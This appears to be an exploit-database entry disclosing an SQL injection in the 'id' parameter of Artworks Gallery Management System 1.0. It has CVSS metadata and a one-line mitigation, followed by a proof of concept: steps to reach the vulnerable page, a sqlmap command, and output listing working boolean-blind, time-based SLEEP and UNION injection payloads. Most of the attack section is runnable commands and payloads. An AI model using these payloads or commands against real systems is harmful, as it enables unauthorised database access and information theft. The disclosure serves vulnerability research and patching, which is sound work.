Artworks Gallery Management System 1.0 - 'id' SQL Injection

vendor:

Artworks Gallery Management System

by:

Vijay Sachdeva

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Artworks Gallery Management System

Affected Version From: Version 1

Affected Version To: Version 1

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:artworks_gallery_management_system:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux

2020

Artworks Gallery Management System 1.0 – ‘id’ SQL Injection

Artworks Gallery Management System 1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can lead to information disclosure and other malicious activities. The vulnerable parameter is 'id' which can be exploited using SQLMap.

Mitigation:

Input validation should be used to prevent SQL Injection attacks. All user input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection
# Exploit Author: Vijay Sachdeva
# Date: 2020-12-22
# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code
# Affected Version: Version 1
# Tested on Kali Linux

Step 1. Log in to the application with admin credentials.

Step 2. Click on "Explore" and then select "Artworks".

Step 3. Choose any item, the URL should be "

http://localhost/art-bay/info_art.php?id=6

Step 4. Run sqlmap on the URL where the "id" parameter is given


sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner

---


Parameter: id (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=8 AND 4531=4531


    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)


    Type: UNION query

    Title: Generic UNION query (NULL) - 9 columns

    Payload: id=8 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)--
-

---

[08:18:34] [INFO] the back-end DBMS is MySQL

[08:18:34] [INFO] fetching banner

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

banner: '10.3.24-MariaDB-2'


---


Step 5. Sqlmap should inject the web-app successfully which leads to
information disclosure.